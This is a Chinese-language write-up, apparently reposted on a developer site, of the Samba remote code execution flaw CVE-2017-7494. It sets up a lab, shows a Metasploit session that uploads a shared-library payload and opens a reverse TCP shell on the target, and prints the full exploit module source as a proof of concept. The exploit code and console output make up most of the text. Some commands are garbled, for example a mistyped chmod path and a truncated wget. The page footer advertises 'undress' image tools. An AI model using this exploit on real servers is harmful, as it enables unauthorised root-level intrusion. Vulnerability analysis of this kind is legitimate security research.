Samba是在Linux和UNIX系统上实现SMB协议的一个软件。
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
360网络安全中心 和 360信息安全部的Gear Team第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。
漏洞简述
▼▼
漏洞编号:CVE-2017-7494
危害等级:严重
影响版本:Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间版本
漏洞描述:2017年5月24日Samba发布了4.6.4版本,修复了一个严重的远程代码执行漏洞,该漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
技术分析
▼▼
如官方所描述,该漏洞只需要通过一个可写入的Samba用户权限就可以提权到samba所在服务器的root权限(samba默认是root用户执行的)。
一、复现环境搭建
搭建Debian和kali两个虚拟机: 攻击机:kali (192.168.217.162); 靶机:debian (192.168.217.150)。
二、Debian安装并配置samba
1、首先,下载安装samba服务器
# apt-get install samba
2、在debian下创建一个共享目录,我这里为/mnt/shared
# mkdir /mnt/shared
3、配置samba服务器的配置文件/etc/samba/smb.conf,在最后添加:
[shared] comment = 'Share for work' path= /mnt/shared guest ok = yes public = yes writable = yes create mask = 0777
4、设置/mnt/shared权限
# chmod –R /mnt/sspaned
5、重启samba服务
# /etc/init.d/samba restart
三、设置攻击机kali
打开kali终端进入到metasploit的exploit目录下的linux文件夹,并新建一个smb文件夹,将攻击脚本放入其中:
# cd /usr/share/metasploit-framework/modules/exploits/linux # mkdir smb # wget
运行metasploit,开始进行攻击(攻击脚本被我重命名为(cve-2017-7494.rb)
# msfconsole msf > use exploit/linux/smb/cve-2017-7494 msf exploit(cve-2017-7494) > set rhost 192.168.217.150 rhost => 192.168.217.150 msf exploit(cve-2017-7494) > set payload linux/x64/shell/reverse_tcp payload => linux/x64/shell/reverse_tcp msf exploit(cve-2017-7494) > set lhost 192.168.217.162 rhost => 192.168.217.162 msf exploit(cve-2017-7494) > run [*] Started reverse TCP handler on 192.168.217.162:4444 [*] 192.168.217.150:445 - Using location \\192.168.217.150\shared\ for the path [*] 192.168.217.150:445 - Payload is stored in //192.168.217.150/shared/ as WzyvkESS.so [*] 192.168.217.150:445 - Trying location /volume1/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume1/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume1/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume1/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /mnt/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /mnt/shared/WzyvkESS.so... [*] Sending stage (38 bytes) to 192.168.217.150 [*] Command shell session 2 opened (192.168.217.162:4444 -> 192.168.217.150:56540) at 2017-05-26 01:17:48 -0400 id uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup) ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:6e:9a:4a inet addr:192.168.217.150 Bcast:192.168.217.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe6e:9a4a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6769 errors:0 dropped:0 overruns:0 frame:0 TX packets:700 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:479898 (468.6 KiB) TX bytes:102796 (100.3 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:35 errors:0 dropped:0 overruns:0 frame:0 TX packets:35 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:3557 (3.4 KiB) TX bytes:3557 (3.4 KiB) whoami nobody
POC:
1 ## 2 # This module requires Metasploit: 3 # Current source: 4 ## 5 6 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client def initialize(info = {}) super(update_info(info, 'Name' => 'Samba is_known_pipename() Arbitrary Module Load', 7 'Description' => %q{ 8 This module triggers an arbitrary shared library load vulnerability 9 in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module 10 requires valid credentials, a writeable folder in an accessible share, 11 and knowledge of the server-side path of the writeable folder. In 12 some cases, anonymous access combined with common filesystem locations 13 can be used to automatically exploit this vulnerability. 14 }, 15 'Author' => 16 [ 17 'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery 18 'hdm', # Metasploit Module 19 ], 20 'License' => MSF_LICENSE, 21 'References' => 22 [ 23 [ 'CVE', '2017-7494' ], 24 [ 'URL', '' ], 25 ], 26 'Payload' => 27 { 28 'Space' => 9000, 29 'DisableNops' => true 30 }, 31 'Platform' => 'linux', 32 # 33 # Targets are currently limited by platforms with ELF-SO payload wrappers 34 # 35 'Targets' => 36 [ 37 [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ], 38 [ 'Linux x86', { 'Arch' => ARCH_X86 } ], 39 [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ], 40 # [ 'Linux MIPS', { 'Arch' => MIPS } ], 41 ], 42 'Privileged' => true, 43 'DisclosureDate' => 'Mar 24 2017', 44 'DefaultTarget' => 2)) 45 46 register_options( 47 [ 48 OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']), 49 OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']), 50 OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']), 51 ]) 52 end 53 54 55 def generate_common_locations 56 candidates = [] 57 if datastore['SMB_SHARE_BASE'].to_s.length > 0 58 candidates << datastore['SMB_SHARE_BASE'] 59 end 60 61 %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name| 62 candidates << base_name 63 candidates << [base_name, @share] 64 candidates << [base_name, @share.downcase] 65 candidates << [base_name, @share.upcase] 66 candidates << [base_name, @share.capitalize] 67 candidates << [base_name, @share.gsub(" ", "_")] 68 end 69 70 candidates.uniq 71 end 72 73 def enumerate_directories(share) 74 begin 75 self.simple.connect("\\\\#{rhost}\\#{share}") 76 stuff = self.simple.client.find_first("\\*") 77 directories = [""] 78 stuff.each_pair do |entry,entry_attr| 79 next if %W{. ..}.include?(entry) 80 next unless entry_attr['type'] == 'D' 81 directories << entry end return directories rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e 82 vprint_error("Enum #{share}: #{e}") 83 return nil 84 85 ensure 86 if self.simple.shares["\\\\#{rhost}\\#{share}"] 87 self.simple.disconnect("\\\\#{rhost}\\#{share}") 88 end 89 end 90 end 91 92 def verify_writeable_directory(share, directory="") 93 begin 94 self.simple.connect("\\\\#{rhost}\\#{share}") 95 96 random_filename = Rex::Text.rand_text_alpha(5)+".txt" 97 filename = directory.length == 0 ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}" 98 99 wfd = simple.open(filename, 'rwct')100 wfd << Rex::Text.rand_text_alpha(8) wfd.close simple.delete(filename) return true rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e101 vprint_error("Write #{share}#{filename}: #{e}")102 return false103 104 ensure105 if self.simple.shares["\\\\#{rhost}\\#{share}"]106 self.simple.disconnect("\\\\#{rhost}\\#{share}")107 end108 end109 end110 111 def share_type(val)112 [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]113 end114 115 def enumerate_shares_lanman116 shares = []117 begin118 res = self.simple.client.trans(119 "\\PIPE\\LANMAN",120 (121 [0x00].pack('v') +122 "WrLeh\x00" +123 "B13BWz\x00" +124 [0x01, 65406].pack("vv")125 ))126 rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e127 vprint_error("Could not enumerate shares via LANMAN")128 return []129 end130 if res.nil?131 vprint_error("Could not enumerate shares via LANMAN")132 return []133 end134 135 lerror, lconv, lentries, lcount = res['Payload'].to_s[136 res['Payload'].v['ParamOffset'],137 res['Payload'].v['ParamCount']138 ].unpack("v4")139 140 data = res['Payload'].to_s[141 res['Payload'].v['DataOffset'],142 res['Payload'].v['DataCount']143 ]144 145 0.upto(lentries - 1) do |i|146 sname,tmp = data[(i * 20) + 0, 14].split("\x00")147 stype = data[(i * 20) + 14, 2].unpack('v')[0]148 scoff = data[(i * 20) + 16, 2].unpack('v')[0]149 scoff -= lconv if lconv != 0150 scomm,tmp = data[scoff, data.length - scoff].split("\x00")151 shares << [ sname, share_type(stype), scomm] end shares end def probe_module_path(path) begin simple.create_pipe(path) rescue Rex::Proto::SMB::Exceptions::ErrorCode => e152 vprint_error("Probe: #{path}: #{e}")153 end154 end155 156 def find_writeable_path(share)157 subdirs = enumerate_directories(share)158 return unless subdirs159 160 if datastore['SMB_FOLDER'].to_s.length > 0161 subdirs.unshift(datastore['SMB_FOLDER'])162 end163 164 subdirs.each do |subdir|165 next unless verify_writeable_directory(share, subdir)166 return subdir167 end168 169 nil170 end171 172 def find_writeable_share_path173 @path = nil174 share_info = enumerate_shares_lanman175 if datastore['SMB_SHARE_NAME'].to_s.length > 0176 share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']177 end178 179 share_info.each do |share|180 next if share.first.upcase == 'IPC$'181 found = find_writeable_path(share.first)182 next unless found183 @share = share.first184 @path = found185 break186 end187 end188 189 def find_writeable190 find_writeable_share_path191 unless @share && @path192 print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")193 fail_with(Failure::NoTarget, "No matching target")194 end195 print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")196 end197 198 def upload_payload199 begin200 self.simple.connect("\\\\#{rhost}\\#{@share}")201 202 random_filename = Rex::Text.rand_text_alpha(8)+".so"203 filename = @path.length == 0 ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}"204 wfd = simple.open(filename, 'rwct')205 wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform}206 )207 wfd.close208 209 @payload_name = random_filename210 return true211 212 rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e213 print_error("Write #{@share}#{filename}: #{e}")214 return false215 216 ensure217 if self.simple.shares["\\\\#{rhost}\\#{@share}"]218 self.simple.disconnect("\\\\#{rhost}\\#{@share}")219 end220 end221 end222 223 def find_payload224 print_status("Payload is stored in //#{rhost}/#{@share}/#{@path} as #{@payload_name}")225 226 # Reconnect to IPC$227 simple.connect("\\\\#{rhost}\\IPC$")228 229 #230 # In a perfect world we would find a way make IPC$'s associated CWD231 # change to our share path, which would allow the following code:232 #233 # probe_module_path("/proc/self/cwd/#{@path}/#{@payload_name}")234 #235 236 # Until we find a better way, brute force based on common paths237 generate_common_locations.each do |location|238 target = [location, @path, @payload_name].join("/").gsub(/\/+/, '/')239 print_status("Trying location #{target}...")240 probe_module_path(target)241 end242 end243 244 def exploit245 # Setup SMB246 connect247 smb_login248 249 # Find a writeable share250 find_writeable251 252 # Upload the shared library payload253 upload_payload254 255 # Find and execute the payload from the share256 find_payload rescue Rex::StreamClosedError257 258 # Shutdown259 disconnect260 end261 262 end
以上是Samba远程代码执行漏洞的实例详解的详细内容。更多信息请关注PHP中文网其他相关文章!
声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
Linux:看看其基本结构Apr 16, 2025 am 12:01 AMLinux的基本结构包括内核、文件系统和Shell。1)内核管理硬件资源,使用uname-r查看版本。2)EXT4文件系统支持大文件和日志,使用mkfs.ext4创建。3)Shell如Bash提供命令行交互,使用ls-l列出文件。
Linux操作:系统管理和维护Apr 15, 2025 am 12:10 AMLinux系统管理和维护的关键步骤包括:1)掌握基础知识,如文件系统结构和用户管理;2)进行系统监控与资源管理,使用top、htop等工具;3)利用系统日志进行故障排查,借助journalctl等工具;4)编写自动化脚本和任务调度,使用cron工具;5)实施安全管理与防护,通过iptables配置防火墙;6)进行性能优化与最佳实践,调整内核参数和养成良好习惯。
了解Linux的维护模式:必需品Apr 14, 2025 am 12:04 AMLinux维护模式通过在启动时添加init=/bin/bash或single参数进入。1.进入维护模式:编辑GRUB菜单,添加启动参数。2.重新挂载文件系统为读写模式:mount-oremount,rw/。3.修复文件系统:使用fsck命令,如fsck/dev/sda1。4.备份数据并谨慎操作,避免数据丢失。
Debian如何提升Hadoop数据处理速度Apr 13, 2025 am 11:54 AM本文探讨如何在Debian系统上提升Hadoop数据处理效率。优化策略涵盖硬件升级、操作系统参数调整、Hadoop配置修改以及高效算法和工具的运用。一、硬件资源强化确保所有节点硬件配置一致,尤其关注CPU、内存和网络设备性能。选择高性能硬件组件对于提升整体处理速度至关重要。二、操作系统调优文件描述符和网络连接数:修改/etc/security/limits.conf文件,增加系统允许同时打开的文件描述符和网络连接数上限。JVM参数调整:在hadoop-env.sh文件中调整
Debian syslog如何学习Apr 13, 2025 am 11:51 AM本指南将指导您学习如何在Debian系统中使用Syslog。Syslog是Linux系统中用于记录系统和应用程序日志消息的关键服务,它帮助管理员监控和分析系统活动,从而快速识别并解决问题。一、Syslog基础知识Syslog的核心功能包括:集中收集和管理日志消息;支持多种日志输出格式和目标位置(例如文件或网络);提供实时日志查看和过滤功能。二、安装和配置Syslog(使用Rsyslog)Debian系统默认使用Rsyslog。您可以通过以下命令安装:sudoaptupdatesud
Debian中Hadoop版本怎么选Apr 13, 2025 am 11:48 AM选择适合Debian系统的Hadoop版本,需要综合考虑以下几个关键因素:一、稳定性与长期支持:对于追求稳定性和安全性的用户,建议选择Debian稳定版,例如Debian11(Bullseye)。该版本经过充分测试,拥有长达五年的支持周期,能够确保系统稳定运行。二、软件包更新速度:如果您需要使用最新的Hadoop功能和特性,则可以考虑Debian的不稳定版(Sid)。但需注意,不稳定版可能存在兼容性问题和稳定性风险。三、社区支持与资源:Debian拥有庞大的社区支持,可以提供丰富的文档和
Debian上TigerVNC共享文件方法Apr 13, 2025 am 11:45 AM本文介绍如何在Debian系统上使用TigerVNC共享文件。你需要先安装TigerVNC服务器,然后进行配置。一、安装TigerVNC服务器打开终端。更新软件包列表:sudoaptupdate安装TigerVNC服务器:sudoaptinstalltigervnc-standalone-servertigervnc-common二、配置TigerVNC服务器设置VNC服务器密码:vncpasswd启动VNC服务器:vncserver:1-localhostno
Debian邮件服务器防火墙配置技巧Apr 13, 2025 am 11:42 AM配置Debian邮件服务器的防火墙是确保服务器安全性的重要步骤。以下是几种常用的防火墙配置方法,包括iptables和firewalld的使用。使用iptables配置防火墙安装iptables(如果尚未安装):sudoapt-getupdatesudoapt-getinstalliptables查看当前iptables规则:sudoiptables-L配置
热AI工具
Undresser.AI Undress
人工智能驱动的应用程序,用于创建逼真的裸体照片
AI Clothes Remover
用于从照片中去除衣服的在线人工智能工具。
Undress AI Tool
免费脱衣服图片
Clothoff.io
AI脱衣机
AI Hentai Generator
免费生成ai无尽的。
热门文章
R.E.P.O.能量晶体解释及其做什么(黄色晶体)
4 周前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最佳图形设置
4 周前By尊渡假赌尊渡假赌尊渡假赌
刺客信条阴影:贝壳谜语解决方案
2 周前ByDDD
R.E.P.O.如果您听不到任何人,如何修复音频
4 周前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.聊天命令以及如何使用它们
4 周前By尊渡假赌尊渡假赌尊渡假赌
热工具
mPDF
mPDF是一个PHP库,可以从UTF-8编码的HTML生成PDF文件。原作者Ian Back编写mPDF以从他的网站上“即时”输出PDF文件,并处理不同的语言。与原始脚本如HTML2FPDF相比,它的速度较慢,并且在使用Unicode字体时生成的文件较大,但支持CSS样式等,并进行了大量增强。支持几乎所有语言,包括RTL(阿拉伯语和希伯来语)和CJK(中日韩)。支持嵌套的块级元素(如P、DIV),
Atom编辑器mac版下载
最流行的的开源编辑器
EditPlus 中文破解版
体积小,语法高亮,不支持代码提示功能
PhpStorm Mac 版本
最新(2018.2.1 )专业的PHP集成开发工具
WebStorm Mac版
好用的JavaScript开发工具
